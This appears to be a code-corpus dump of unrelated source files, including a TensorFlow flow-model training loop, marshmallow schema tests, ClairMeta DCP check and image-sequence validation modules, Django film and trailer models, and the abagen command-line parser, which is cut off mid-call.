with tf.GradientTape() as tape:
_, _ = latent_model(x, reverse=False)
variables_latent_model = tape.watched_variables()
parameters_latent_model = np.sum([np.prod(v.get_shape().as_list()) for v in variables_latent_model])
print('Number of trainable_parameters of bijective model: {}'.format(parameters_latent_model))
ML_loss_metric.update_state(ml_loss)
pz_metric.update_state(p)
jacobian_metric.update_state(j)
sample_number = 25 # Number of samples to show
# Sampling from distribution
z_random_base = pz.prior.sample(sample_number) # sampling from base (gaussian) with Temprature = 1
z_random_base_T = (z_random_base - pz.mu) * T + pz.mu # sampling from base (gaussian) with Temprature = T
x_sampled = latent_model(z_random_base , reverse = True)[0].numpy() # Intermediate samples with Temprature = 1
x_sampled_T = latent_model(z_random_base_T , reverse = True)[0].numpy() # Intermediate samples with Temprature = T
# Saving experiment results
samples_folder = os.path.join(exp_path, 'Generated_samples')
if not os.path.exists(samples_folder):
os.mkdir(samples_folder)
ngrid = int(np.sqrt(sample_number))
image_path_sampled = os.path.join(samples_folder, 'sampled')
if os.path.exists(image_path_sampled) == False:
os.mkdir(image_path_sampled)
cv2.imwrite(os.path.join(image_path_sampled, 'sampled_epoch %d.png' % (epoch,)),
x_sampled[:, :, :, ::-1].reshape(
ngrid, ngrid,
image_size, image_size, c).swapaxes(1, 2)
.reshape(ngrid*image_size, -1, c)*127.5 + 127.5) # samples from distribution with Temprature = 1
cv2.imwrite(os.path.join(image_path_sampled, 'Tempreture_sampled_epoch %d.png' % (epoch,)),
x_sampled_T[:, :, :, ::-1].reshape(
ngrid, ngrid,
image_size, image_size, c).swapaxes(1, 2)
.reshape(ngrid*image_size, -1, c)*127.5 + 127.5) # samples from distribution with Temprature = T
# Saving logs
with ML_summary_writer.as_default():
tf.summary.scalar(
'ML_loss', ML_loss_metric.result(), step=epoch)
with pz_summary_writer.as_default():
tf.summary.scalar(
'pz', pz_metric.result(), step=epoch)
with jacobian_summary_writer.as_default():
tf.summary.scalar(
'jacobian', jacobian_metric.result(), step=epoch)
print("Epoch {:03d}: ML Loss: {:.3f} "
.format(epoch, ML_loss_metric.result().numpy()))
ML_loss_metric.reset_states()
pz_metric.reset_states()
jacobian_metric.reset_states()
save_path = manager.save()
print("Saved checkpoint for epoch {}: {}".format(epoch, save_path))
epoch_end = time()
time_vector[epoch] = epoch_end - epoch_start
np.save(os.path.join(exp_path, 'time_vector.npy') , time_vector)
print('epoch time:{}'.format(time_vector[epoch]))
if __name__ == '__main__':
train(num_epochs,
batch_size,
dataset,
lr,
exp_path)
``` |
{
"source": "4linux/HandsOn-Flask-App",
"score": 2
} |
#### File: app/extentions/configuration.py
```python
from dynaconf import FlaskDynaconf
def init_app(app):
conf = FlaskDynaconf(app)
return conf
``` |
{
"source": "4lissonsilveira/marshmallow",
"score": 2
} |
#### File: marshmallow/tests/test_options.py
```python
from collections import OrderedDict
import pytest
from marshmallow import fields, Schema
from marshmallow.exceptions import ValidationError
from tests.base import * # noqa
class TestStrict:
class StrictUserSchema(UserSchema):
class Meta:
strict = True
def test_strict_meta_option(self):
with pytest.raises(ValidationError):
self.StrictUserSchema().load({'email': 'foo.com'})
def test_strict_meta_option_is_inherited(self):
class StrictUserSchema(UserSchema):
class Meta:
strict = True
class ChildStrictSchema(self.StrictUserSchema):
pass
with pytest.raises(ValidationError):
ChildStrictSchema().load({'email': 'foo.com'})
class TestUnordered:
class UnorderedSchema(Schema):
name = fields.Str()
email = fields.Str()
class Meta:
ordered = False
def test_unordered_dump_returns_dict(self):
schema = self.UnorderedSchema()
u = User('steve', email='<EMAIL>')
result = schema.dump(u)
assert not isinstance(result.data, OrderedDict)
assert type(result.data) is dict
def test_unordered_load_returns_dict(self):
schema = self.UnorderedSchema()
result = schema.load({'name': 'steve', 'email': '<EMAIL>'})
assert not isinstance(result.data, OrderedDict)
assert type(result.data) is dict
class KeepOrder(Schema):
class Meta:
ordered = True
name = fields.String(allow_none=True)
email = fields.Email(allow_none=True)
age = fields.Integer()
created = fields.DateTime()
id = fields.Integer(allow_none=True)
homepage = fields.Url()
birthdate = fields.Date()
class OrderedMetaSchema(Schema):
id = fields.Int(allow_none=True)
email = fields.Email(allow_none=True)
class Meta:
fields = ('name', 'email', 'age', 'created',
'id', 'homepage', 'birthdate')
ordered = True
class OrderedNestedOnly(Schema):
class Meta:
ordered = True
user = fields.Nested(KeepOrder)
class TestFieldOrdering:
@pytest.mark.parametrize('with_meta', (False, True))
def test_ordered_option_is_inherited(self, user, with_meta):
class ParentUnordered(Schema):
class Meta:
ordered = False
# KeepOrder is before ParentUnordered in MRO,
# so ChildOrderedSchema will be ordered
class ChildOrderedSchema(KeepOrder, ParentUnordered):
if with_meta:
class Meta:
pass
schema = ChildOrderedSchema()
assert schema.opts.ordered is True
assert schema.dict_class == OrderedDict
data, errors = schema.dump(user)
assert not errors
keys = list(data)
assert keys == ['name', 'email', 'age', 'created', 'id', 'homepage', 'birthdate']
# KeepOrder is before ParentUnordered in MRO,
# so ChildOrderedSchema will be ordered
class ChildUnorderedSchema(ParentUnordered, KeepOrder):
class Meta:
pass
schema = ChildUnorderedSchema()
assert schema.opts.ordered is False
def test_ordering_is_off_by_default(self):
class DummySchema(Schema):
pass
schema = DummySchema()
assert schema.ordered is False
def test_declared_field_order_is_maintained_on_dump(self, user):
ser = KeepOrder()
data, errs = ser.dump(user)
keys = list(data)
assert keys == ['name', 'email', 'age', 'created', 'id', 'homepage', 'birthdate']
def test_declared_field_order_is_maintained_on_load(self, serialized_user):
schema = KeepOrder()
data, errs = schema.load(serialized_user.data)
assert not errs
keys = list(data)
assert keys == ['name', 'email', 'age', 'created', 'id', 'homepage', 'birthdate']
def test_nested_field_order_with_only_arg_is_maintained_on_dump(self, user):
schema = OrderedNestedOnly()
data, errs = schema.dump({'user': user})
user_data = data['user']
keys = list(user_data)
assert keys == ['name', 'email', 'age', 'created', 'id', 'homepage', 'birthdate']
def test_nested_field_order_with_only_arg_is_maintained_on_load(self):
schema = OrderedNestedOnly()
data, errs = schema.load({'user': {
'name': 'Foo',
'email': '<EMAIL>',
'age': 42,
'created': dt.datetime.now().isoformat(),
'id': 123,
'homepage': 'http://foo.com',
'birthdate': dt.datetime.now().isoformat(),
}})
user_data = data['user']
keys = list(user_data)
assert keys == ['name', 'email', 'age', 'created', 'id', 'homepage', 'birthdate']
def test_nested_field_order_with_exclude_arg_is_maintained(self, user):
class HasNestedExclude(Schema):
class Meta:
ordered = True
user = fields.Nested(KeepOrder, exclude=('birthdate', ))
ser = HasNestedExclude()
data, errs = ser.dump({'user': user})
user_data = data['user']
keys = list(user_data)
assert keys == ['name', 'email', 'age', 'created', 'id', 'homepage']
def test_meta_fields_order_is_maintained_on_dump(self, user):
ser = OrderedMetaSchema()
data, errs = ser.dump(user)
keys = list(data)
assert keys == ['name', 'email', 'age', 'created', 'id', 'homepage', 'birthdate']
def test_meta_fields_order_is_maintained_on_load(self, serialized_user):
schema = OrderedMetaSchema()
data, errs = schema.load(serialized_user.data)
assert not errs
keys = list(data)
assert keys == ['name', 'email', 'age', 'created', 'id', 'homepage', 'birthdate']
class TestIncludeOption:
class AddFieldsSchema(Schema):
name = fields.Str()
class Meta:
include = {
'from': fields.Str()
}
def test_fields_are_added(self):
s = self.AddFieldsSchema()
in_data = {'name': 'Steve', 'from': 'Oskosh'}
result = s.load({'name': 'Steve', 'from': 'Oskosh'})
assert result.data == in_data
def test_ordered_included(self):
class AddFieldsOrdered(Schema):
name = fields.Str()
email = fields.Str()
class Meta:
include = OrderedDict([
('from', fields.Str()),
('in', fields.Str()),
('@at', fields.Str())
])
ordered = True
s = AddFieldsOrdered()
in_data = {'name': 'Steve', 'from': 'Oskosh', 'email': '<EMAIL>',
'in': 'VA', '@at': 'Charlottesville'}
# declared fields, then "included" fields
expected_fields = ['name', 'email', 'from', 'in', '@at']
assert list(AddFieldsOrdered._declared_fields.keys()) == expected_fields
result = s.load(in_data)
assert list(result.data.keys()) == expected_fields
def test_added_fields_are_inherited(self):
class AddFieldsChild(self.AddFieldsSchema):
email = fields.Str()
s = AddFieldsChild()
assert 'email' in s._declared_fields.keys()
assert 'from' in s._declared_fields.keys()
assert isinstance(s._declared_fields['from'], fields.Str)
``` |
{
"source": "4lm/ClairMeta",
"score": 2
} |
#### File: ClairMeta/clairmeta/dcp_check_base.py
```python
import six
import time
import inspect
import traceback
from clairmeta.logger import get_log
from clairmeta.utils.file import human_size
class CheckException(Exception):
""" All check shall raise a CheckException in case of falure. """
def __init__(self, msg):
super(CheckException, self).__init__(six.ensure_str(msg))
class CheckExecution(object):
""" Check execution with status and time elapsed. """
def __init__(self, name):
self.name = name
self.doc = ""
self.message = ""
self.valid = False
self.seconds_elapsed = 0
self.asset_stack = []
self.criticality = ""
class CheckerBase(object):
""" Base class for check module, provide check discover and run utilities.
All check module shall derive from this class.
"""
def __init__(self, dcp, profile):
""" CheckerBase constructor.
Args:
dcp (clairmeta.DCP): DCP object.
profile (dict): Checker profile.
"""
self.dcp = dcp
self.check_profile = profile
self.check_log = get_log()
self.check_executions = []
self.check_report = {}
self.hash_callback = None
def find_check_criticality(self, name):
""" Find criticality of a particular check (using profile).
Args:
name (str): Name of the check function.
Returns:
Criticality level string.
"""
check_level = self.check_profile['criticality']
default = check_level.get('default', 'ERROR')
score_profile = {
0: default
}
for c_name, c_level in six.iteritems(check_level):
if name.startswith(c_name):
score_profile[len(c_name)] = c_level
return score_profile[max(score_profile.keys())]
def find_check(self, prefix):
""" Discover checks functions (using introspection).
Args:
prefix (str): Prefix of the checks to find (excluding leading
'check_').
Returns:
List of check functions.
"""
member_list = inspect.getmembers(self, predicate=inspect.ismethod)
bypass = self.check_profile['bypass']
checks = []
for k, v in member_list:
check_prefix = k.startswith('check_' + prefix)
check_bypass = any([k.startswith(c) for c in bypass])
if check_prefix and not check_bypass:
checks.append(v)
return checks
def find_check_failed(self):
""" Returns a list of all failed checks. """
return [c for c in self.check_executions if not c.valid]
def run_check(self, check, *args, **kwargs):
""" Execute a check.
Args:
check (tuple): Tuple (function name, function).
*args: Variable list of check function arguments.
**kwargs: Variable list of keywords arguments.
error_prefix (str): error message prefix
Returns:
Tuple (status, return_value)
"""
start = time.time()
name, func = check.__name__, check
check_exec = CheckExecution(name)
check_exec.doc = check.__doc__
check_res = None
try:
check_res = func(*args)
check_exec.valid = True
check_exec.msg = "Check valid"
except CheckException as e:
if kwargs.get('error_prefix'):
msg = "{}\n\t{}".format(kwargs.get('error_prefix'), str(e))
else:
msg = str(e)
check_exec.msg = msg
check_exec.criticality = self.find_check_criticality(name)
except Exception as e:
check_exec.msg = "Check unknown error\n{}".format(
traceback.format_exc())
check_exec.criticality = "ERROR"
self.check_log.error(check_exec.msg)
finally:
check_exec.asset_stack = kwargs.get('stack', [self.dcp.path])
check_exec.seconds_elapsed = time.time() - start
self.check_executions.append(check_exec)
return check_exec.valid, check_res
def make_report(self):
""" Check report generation. """
self.check_report = {
'ERROR': [],
'WARNING': [],
'INFO': [],
'SILENT': []
}
for c in self.find_check_failed():
self.check_report[c.criticality].append((c.name, c.msg))
check_unique = set([c.name for c in self.check_executions])
self.check_elapsed = {}
self.total_time = 0
self.total_check = len(check_unique)
for name in check_unique:
execs = [c.seconds_elapsed
for c in self.check_executions if c.name == name]
elapsed = sum(execs)
self.total_time += elapsed
self.check_elapsed[name] = elapsed
def dump_report(self):
""" Dump check report. """
valid_str = 'Success' if self.get_valid() else 'Fail'
pretty_status = {
'ERROR': 'Error(s)',
'WARNING': 'Warning(s)',
'INFO': 'Info(s)',
'SILENT': 'Supressed(s)',
'BYPASS': 'Bypass(s)',
}
map_status = {
'ERROR': {},
'WARNING': {},
'INFO': {},
'SILENT': {},
}
# Accumulate all failed check and stack them by asset
for c in self.find_check_failed():
node = map_status[c.criticality]
for filename in c.asset_stack:
if filename not in node:
node[filename] = {}
node = node[filename]
if 'messages' not in node:
node['messages'] = []
docstring_lines = c.doc.split('\n')
desc = docstring_lines[0] if docstring_lines else c.name
node['messages'] += ['.' + desc + '\n' + c.msg]
self.check_log.info("DCP : {}".format(self.dcp.path))
self.check_log.info("Size : {}".format(human_size(self.dcp.size)))
for status, vals in six.iteritems(map_status):
out_stack = []
for k, v in six.iteritems(vals):
out_stack += [self.dump_stack("", k, v, indent_level=0)]
if out_stack:
self.check_log.info("{}\n{}".format(
pretty_status[status] + ':',
"\n".join(out_stack)))
if self.check_profile['bypass']:
checks_str = ' ' + '\n '.join(self.check_profile['bypass'])
self.check_log.info("{}\n{}".format(
pretty_status['BYPASS'] + ':', checks_str))
self.check_log.info("Total check : {}".format(self.total_check))
self.check_log.info("Total time : {:.2f} sec".format(self.total_time))
self.check_log.info("Validation : {}\n".format(valid_str))
def dump_stack(self, out_str, key, values, indent_level):
""" Recursively iterate through the error message stack.
Args:
out_str (str): Accumulate messages to ``out_str``
key (str): Filename of the current asset.
values (dict): Message stack to dump.
indent_level (int): Current indentation level.
Returns:
Output error message string
"""
indent_offset = 2
indent_step = 2
indent_char = ' '
ind = indent_offset + indent_level
filename = key
desc = self.title_from_filename(filename)
messages = values.pop('messages', [])
out_str = '' if indent_level == 0 else '\n'
out_str += indent_char * ind + '+ '
out_str += filename
out_str += ' ' + desc if desc else ''
ind += indent_step
for m in messages:
out_str += "\n"
out_str += indent_char * ind
# Correct indentation for multi-lines messages
out_str += ("\n" + indent_char * (ind + 2)).join(m.split("\n"))
ind -= indent_step
for k, v in six.iteritems(values):
out_str += self.dump_stack(
out_str, k, v, indent_level + indent_step)
return out_str
def title_from_filename(self, filename):
""" Returns a human friendly title for the given file. """
for cpl in self.dcp._list_cpl:
if cpl['FileName'] == filename:
desc = "({})".format(
cpl['Info']['CompositionPlaylist'].get(
'ContentTitleText', ''))
return desc
for pkl in self.dcp._list_pkl:
if pkl['FileName'] == filename:
desc = "({})".format(
pkl['Info']['PackingList'].get('AnnotationText', ''))
return desc
return ''
def get_valid(self):
""" Check status is valid. """
return self.check_report['ERROR'] == []
```
#### File: ClairMeta/clairmeta/sequence_check.py
```python
import os
from clairmeta.settings import SEQUENCE_SETTINGS
from clairmeta.utils.sys import number_is_close
from clairmeta.utils.file import parse_name
def check_sequence(path, allowed_extensions, ignore_files=None, ignore_dirs=None):
""" Check image file sequence coherence recursively.
Args:
path (str): Base directory path.
allowed_extensions (dict): Dictionary mapping extensions.
ignore_files (list): List of files name to ignore.
ignore_dirs (list): List of directory name to ignore.
Raises:
ValueError: If ``path`` is not a valid directory.
ValueError: If ``path`` is an empty directory.
ValueError: If ``allowed_extensions`` is not a dictionary.
"""
if not os.path.isdir(path):
raise ValueError("Folder not found : {}".format(path))
if not os.listdir(path):
raise ValueError("Empty folder")
if not isinstance(allowed_extensions, dict):
raise ValueError("Wrong arguments, allowed_extensions must be a dict")
for dirpath, dirnames, filenames in os.walk(path, topdown=True):
# Filter out explicitly ignored files
if ignore_files:
filenames = [f for f in filenames if f not in ignore_files]
if ignore_dirs:
# Why dirnames[:] ? Quote from the documentation :
# When topdown is True, the caller can modify the dirnames list
# in-place (perhaps using del or slice assignment).
dirnames[:] = [d for d in dirnames if d not in ignore_dirs]
# No files in folder, nothing to check..
if not filenames:
continue
# First file in folder is the reference
check_sequence_folder(dirpath, filenames, allowed_extensions)
def check_sequence_folder(dirpath, filenames, allowed_extensions):
""" Check image file sequence coherence.
This function checks :
- Image extension and Mime type is authorized
- No jump (missing frame) are found in the whole sequence
- All images must have the same file name (excluding index)
- All images must have the same extension and Mime type
- All images must have the same size (we work on uncompressed files
only)
Args:
dirpath (str): Directory path.
filenames (list): List of files to check in ``dirpath``.
allowed_extensions (dict): Dictionary mapping extensions.
Raises:
ValueError: If image file sequence check failed.
"""
settings = SEQUENCE_SETTINGS['ALL']
size_rtol = settings['size_diff_tol'] / 1e2
# First file in folder is the reference
fileref = filenames[0]
fullpath_ref = os.path.join(dirpath, fileref)
filename, idx = parse_name(fileref)
filesize = os.path.getsize(fullpath_ref)
extension = os.path.splitext(fileref)[-1]
sequence_idx = [idx]
# Check that this reference is conform
if extension not in allowed_extensions:
raise ValueError('extension {} not authorized'.format(extension))
# Then check that all subsequent files are identical
for f in filenames[1:]:
fullpath = os.path.join(dirpath, f)
current_ext = os.path.splitext(f)[-1]
current_filename, current_idx = parse_name(f)
current_filesize = os.path.getsize(fullpath)
sequence_idx.append(current_idx)
if current_filename != filename:
raise ValueError('Filename difference, {} but expected {}'
.format(current_filename, filename))
if current_ext != extension:
raise ValueError('File extension difference, {} but expected {}'
.format(current_filename, extension))
if not number_is_close(current_filesize, filesize, rtol=size_rtol):
raise ValueError(
'{} : file size difference got {} but expected {}'
' - tolerance of {}%'.format(
current_filename, current_filesize,
filesize, settings['size_diff_tol']))
# Check for jump in sequence (ie. missing frame(s))
sequence_idx.sort()
for idx, fno in enumerate(sequence_idx, sequence_idx[0]):
if idx != fno:
raise ValueError(
'File sequence jump found, file {} not found'.format(idx))
```
#### File: ClairMeta/tests/test_profile.py
```python
import unittest
import os
from clairmeta.utils.file import temporary_file
from clairmeta.profile import load_profile, save_profile, get_default_profile
class ProfileTest(unittest.TestCase):
def get_file_path(self, name):
file_path = os.path.join(
os.path.dirname(__file__),
'resources', name)
return file_path
def test_load_profile(self):
p = load_profile(self.get_file_path('myprofile.json'))
self.assertEqual(p['log_level'], 'INFO')
self.assertEqual(p['bypass'], ["check_assets_pkl_hash"])
self.assertEqual(p['criticality']['default'], 'ERROR')
def test_save_profile(self):
with temporary_file(suffix='.json') as f:
p_gold = get_default_profile()
save_profile(p_gold, f)
p = load_profile(f)
self.assertEqual(p, p_gold)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "4lm/trailer",
"score": 2
} |
#### File: trailer/trailerapp/models.py
```python
from django.db import models
from django.contrib.auth.models import User
from PIL import ExifTags, Image
class Genre(models.Model):
tmdb_id = models.IntegerField(unique=True)
name = models.CharField(max_length=64)
def __str__(self):
return self.name
__repr__ = __str__
class Film(models.Model):
title = models.CharField(max_length=255)
original_title = models.CharField(max_length=255, null=True)
language = models.CharField(max_length=8, null=True) # iso_639_1
original_language = models.CharField(max_length=8, null=True) # iso_639_1
region = models.CharField(max_length=8, null=True) # iso_3166_1
overview = models.TextField(null=True)
release_date = models.DateTimeField(null=True)
tmdb_id = models.CharField(max_length=64, null=True, unique=True)
vote_average = models.FloatField(null=True)
vote_count = models.IntegerField(null=True)
backdrop_path = models.CharField(max_length=255, null=True)
poster_path = models.CharField(max_length=255, null=True)
genre = models.ManyToManyField(Genre)
def __str__(self):
return self.title
__repr__ = __str__
class Trailer(models.Model):
title = models.CharField(max_length=255)
film = models.ForeignKey(Film, on_delete=models.CASCADE)
tmdb_id = models.CharField(max_length=64, null=True, unique=True)
language = models.CharField(max_length=8, null=True) # iso_639_1
region = models.CharField(max_length=8, null=True) # iso_3166_1
site = models.CharField(max_length=64, null=True) # origin of video
site_key = models.CharField(max_length=64, null=True) # key of video at origin
type = models.CharField(max_length=10, null=True) # Trailer|Teaser
date_added = models.DateTimeField(null=True)
def __str__(self):
return self.title
__repr__ = __str__
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
image = models.ImageField(default='default.jpg', upload_to='profile_pics')
def __str__(self):
return '{} Profile'.format(self.user.username)
__repr__ = __str__
def save(self, force_insert=False, force_update=False, using=None):
super().save()
img = Image.open(self.image.path)
try:
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
exif = dict(img._getexif().items())
if exif[orientation] == 3:
img = img.rotate(180, expand=True)
elif exif[orientation] == 6:
img = img.rotate(270, expand=True)
elif exif[orientation] == 8:
img = img.rotate(90, expand=True)
img.save(self.image.path)
except (AttributeError, KeyError, IndexError):
# cases: image don't have getexif
pass
max_width, max_height = 300, 300
if img.height > max_height or img.width > max_width:
if img.height >= img.width:
aspect_ratio = img.height / img.width
output_size = (max_width, max_height * aspect_ratio)
else:
aspect_ratio = img.width / img.height
output_size = (max_width * aspect_ratio, max_height)
img.thumbnail(output_size)
if img.height is not img.width:
width, height = img.size
left = (width - max_width) / 2
top = (height - max_height) / 2
right = (width + max_width) / 2
bottom = (height + max_height) / 2
cropped_img = img.crop((left, top, right, bottom))
cropped_img.save(self.image.path)
else:
img.save(self.image.path)
img.close()
``` |
{
"source": "4lovi4/abagen",
"score": 3
} |
#### File: abagen/cli/run.py
```python
import argparse
import logging
import os
from pathlib import Path
import sys
lgr = logging.getLogger('abagen')
def _resolve_path(path):
""" Helper function for get_parser() to resolve paths
"""
if path is not None:
try:
return str(Path(path).expanduser().resolve())
except FileNotFoundError:
return os.path.abspath(os.path.expanduser(path))
def _resolve_none(inp):
""" Helper function to allow 'None' as input from argparse
"""
if inp == "None":
return
return inp
class CheckExists(argparse.Action):
""" Helper class to check that provided paths exist
"""
def __call__(self, parser, namespace, values, option_string=None):
values = self.type(values)
if not os.path.exists(_resolve_path(values)):
parser.error('Provided value for {} does not exist: {}'
.format(option_string, values))
setattr(namespace, self.dest, values)
def get_parser():
""" Gets command-line arguments for primary get_expression_data workflow
"""
from .. import __version__
from ..correct import NORMALIZATION_METHODS
from ..probes_ import SELECTION_METHODS
verstr = 'abagen {}'.format(__version__)
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description="""
Assigns microarray expression data to ROIs defined in the specific `atlas`
This command aims to provide a workflow for generating pre-processed microarray
expression data from the Allen Human Brain Atlas for arbitrary atlas
designations. First, some basic filtering of genetic probes is performed,
including:
1. Intensity-based filtering of microarray probes to remove probes that do
not exceed a certain level of background noise (specified via the
`ibf_threshold` parameter), and
2. Selection of a single, representative probe (or collapsing across
probes) for each gene, specified via the `probe_selection` parameter.
Tissue samples are then matched to parcels in the defined `atlas` for each
donor. If `atlas_info` is provided then this matching is constrained by both
hemisphere and tissue class designation (e.g., cortical samples from the left
hemisphere are only matched to ROIs in the left cortex, subcortical samples
from the right hemisphere are only matched to ROIs in the left subcortex); see
the `atlas_info` parameter description for more information.
Matching of microarray samples to parcels in `atlas` is done via a multi-step
process:
1. Determine if the sample falls directly within a parcel,
2. Check to see if there are nearby parcels by slowly expanding the search
space to include nearby voxels, up to a specified distance (specified
via the `tolerance` parameter),
3. If there are multiple nearby parcels, the sample is assigned to the
closest parcel, as determined by the parcel centroid.
If at any step a sample can be assigned to a parcel the matching process is
terminated. If multiple sample are assigned to the same parcel they are
aggregated with the metric specified via the `agg_metric` parameter. More
control over the sample matching can be obtained by setting the `inexact`
parameter; see the parameter description for more information.
Once all samples have been matched to parcels for all supplied donors, the
microarray expression data are optionally normalized via the provided
`sample_norm` and `gene_norm` functions before being combined within parcels
and across donors via the supplied `agg_metric`.
"""
)
parser.add_argument('atlas', action=CheckExists, type=_resolve_path,
help='An image in MNI space, where each parcel in the '
'image is identified by a unique integer ID.')
# because I like consistency in capitalization and punctuation...
for act in parser._actions:
if isinstance(act, argparse._HelpAction):
act.help = act.help.capitalize() + '.'
break
parser.add_argument('--version', action='version', version=verstr,
help='Show program\'s version number and exit.')
parser.add_argument('-v', '--verbose', action='count', default=1,
help='Increase verbosity of status messages to '
'display during workflow.')
parser.add_argument('-q', '--quiet', action='store_true', default=False,
help='Suppress all status messages during workflow.')
parser.add_argument('--debug', action='store_true', help=argparse.SUPPRESS)
a_data = parser.add_argument_group('Options to specify information about '
'the atlas used')
a_data.add_argument('--atlas_info', '--atlas-info', action=CheckExists,
type=_resolve_path, default=None, metavar='PATH',
help='Filepath to CSV files containing information '
'about `atlas`. The CSV file must have at least '
'columns ["id", "hemisphere", "structure"] which '
'contain information mapping the atlas IDs to '
'hemispheres (i.e, "L", "R") and broad '
'structural groups (i.e., "cortex", "subcortex", '
'"cerebellum", "brainstem").')
g_data = parser.add_argument_group('Options to specify which AHBA data to '
'use during processing')
g_data.add_argument('--donors', action='store', nargs='+',
default='all', metavar='DONOR_ID',
help='List of donors to use as sources of expression '
'data. Specified IDs can be either donor numbers '
'(i.e., 9861, 10021) or UIDs (i.e., H0351.2001). '
'Can specify "all" to use all available donors. '
'Default: "all"')
g_data.add_argument('--data_dir', '--data-dir', action=CheckExists,
type=_resolve_path, metavar='PATH',
help='Directory where expression data should be '
'downloaded to (if it does not already exist) / '
'loaded from. If not specified this will check '
'the environmental variable $ABAGEN_DATA, the '
'$HOME/abagen-data directory, and the current '
'working directory. If data does not already '
'exist at one of those locations then it will be '
'downloaded to the first of these location that '
'exists and for which write access is enabled.')
w_data = parser.add_argument_group('Options to specify processing options')
w_data.add_argument('--inexact', dest='exact', action='store_false',
default=True,
help='Whether to use inexact matching of donor tissue '
'samples to parcels in `atlas`. By default, the '
'workflow will match tissue samples to parcels '
'within `tolerance` mm of the sample; any '
'samples that are beyond `tolerance` mm of a '
'parcel will be discarded, which may result in '
'some parcels having no assigned sample / '
'expression data. If --inexact, the matching '
'procedure will be performed and followed by a '
'check for parcels with no assigned samples; any '
'such parcels will be matched to the nearest '
'sample (defined as the sample with the closest '
'Euclidean distance to the parcel centroid). '
'Default: False')
w_data.add_argument('--tol', '--tolerance', dest='tolerance',
action='store', type=float, default=2,
help='Distance (in mm) that a sample can be from a '
'parcel for it to be matched to that parcel. '
'This is only considered if the sample is not '
'directly within a parcel. Default: 2')
w_data.add_argument('--ibf_threshold', '--ibf-threshold', action='store',
default=0.5, metavar='THRESHOLD',
help='Threshold for intensity-based filtering of '
'probes. This number should specify the ratio of '
'samples, across all supplied donors, for which '
'a probe must have signal above background noise '
'in order to be retained. Default: 0.5')
w_data.add_argument('--region_agg', '--region-agg', action='store',
default='donors', metavar='METHOD',
choices=['donors', 'samples'],
help='When multiple samples are identified as '
'belonging to a region in `atlas` this '
'determines how they are aggegated. If '
'\'samples\', expression data from all samples '
'for all donors assigned to a given region are '
'combined. If \'donors\', expression values for '
'all samples assigned to a given region are '
'combined independently for each donor before '
'being combined across donors. See `agg_metric` '
'for mechanism by which samples are combined. '
'Default: \'donors\'')
w_data.add_argument('--agg_metric', '--agg-metric', action='store',
default='mean', metavar='METHOD',
choices=['mean', 'median'],
help='Mechanism by which to (1) reduce expression '
'data of multiple samples in the same `atlas` '
'region, and (2) reduce donor-level expression '
'data into a single "group" expression '
'dataframe. Must be one of {"mean", "median"}. '
'Default: "mean"')
w_data.add_argument('--probe_selection', '--probe-selection',
action='store', default='diff_stability',
metavar='METHOD', choices=sorted(SELECTION_METHODS),
help='Selection method for subsetting (or collapsing '
'across) probes that index the same gene. Must '
'be one of {"average", "mean", "max_intensity", '
'"max_variance", "pc_loading", "corr_variance", '
'"corr_intensity", "diff_stability", "rnaseq"}. '
'Default: "diff_stability"')
w_data.add_argument('--lr_mirror', '--lr-mirror', action='store_true',
help='Whether to mirror microarray expression samples '
'across hemispheres to increase spatial '
'coverage. This will duplicate samples across '
'both hemispheres (i.e., L->R and R->L), '
'approximately doubling the number of available '
'samples. Default: False (i.e., no mirroring)')
w_data.add_argument('--gene_norm', '--gene-norm', action='store',
default='srs', metavar='METHOD', type=_resolve_none,
choices=sorted(NORMALIZATION_METHODS) + ['None', None],
help='Method by which to normalize microarray '
'expression values for each donor prior to '
'collapsing across donors. Expression values are '
'normalized separately for each gene for each '
'donor across all expression samples. If None is '
'specified then no normalization is performed. '
'Default: "srs"')
w_data.add_argument('--sample_norm', '--sample-norm', action='store',
default='srs', metavar='METHOD', type=_resolve_none,
choices=sorted(NORMALIZATION_METHODS) + ['None', None],
help='Method by which to normalize microarray '
'expression values for each sample prior to '
'collapsing into regions in `atlas`. Expression '
'values are normalized separately for each '
'sample and donor across genes. If None is '
'specified then no normalization is performed. '
'Default: "srs"')
p_data = parser.add_argument_group('Options to modify the AHBA data used')
p_data.add_argument('--no-reannotated', '--no_reannotated',
dest='reannotated', action='store_false', default=True,
help='Whether to use the original probe information '
'from the AHBA dataset instead of the '
'reannotated probe information from '
'Arnatkevic̆iūtė et al., 2019. Using reannotated '
'probe information discards probes that could '
'not be reliably matched to genes. Default: '
'False (i.e., use reannotations)')
p_data.add_argument('--no-corrected-mni', '--no_corrected_mni',
dest='corrected_mni', action='store_false',
default=True,
help='Whether to use the original MNI coordinates '
'provided with the AHBA data instead of the '
'"corrected" MNI coordinates shipped with the '
'`alleninf` package when matching tissue samples '
'to anatomical regions. Default: False (i.e., '
'use corrected coordinates)')
o_data = parser.add_argument_group('Options to modify how data are output')
o_data.add_argument('--stdout', action='store_true',
help='Generated region x gene dataframes will be '
'printed to stdout for piping to other things. '
'You should REALLY consider just using --output-'
'file instead and working with the generated '
'CSV file(s). Incompatible with `--save-counts` '
'and `--save-donors` (i.e., this will override '
'those options). Default: False')
o_data.add_argument('--output-file', '--output_file', action='store',
type=_resolve_path, metavar='PATH',
default='abagen_expression.csv',
help='Path to desired output file. The generated '
'region x gene dataframe will be saved here. '
'Default: $PWD/abagen_expression.csv')
o_data.add_argument('--save-counts', '--save_counts', action='store_true',
help='Whether to save dataframe containing number of '
'samples from each donor that were assigned '
'to each region in `atlas`. If specified, will '
'be saved to the path specified by '
'`output-file`, appending "counts" to the end of '
'the filename. Default: False')
o_data.add_argument('--save-donors', '--save_donors', action='store_true',
help='Whether to save donor-level expression '
'dataframes instead of aggregating expression '
'across donors with provided `agg_metric`. If '
'specified, dataframes will be saved to path '
'specified by `output-file`, appending donor IDs '
'to the end of the filename. Default: False')
return parser
def main(args=None):
""" Runs primary get_expression_data workflow
"""
from ..allen import get_expression_data
from ..datasets import WELL_KNOWN_IDS as donors
opts = get_parser().parse_args(args)
# quiet overrides any verbosity setting
if opts.quiet:
opts.verbose = 0
# debugging is fun
if opts.debug:
print(opts)
return
# run the workflow
expression = get_expression_data(atlas=opts.atlas,
atlas_info=opts.atlas_info,
exact=opts.exact,
tolerance=opts.tolerance,
region_agg=opts.region_agg,
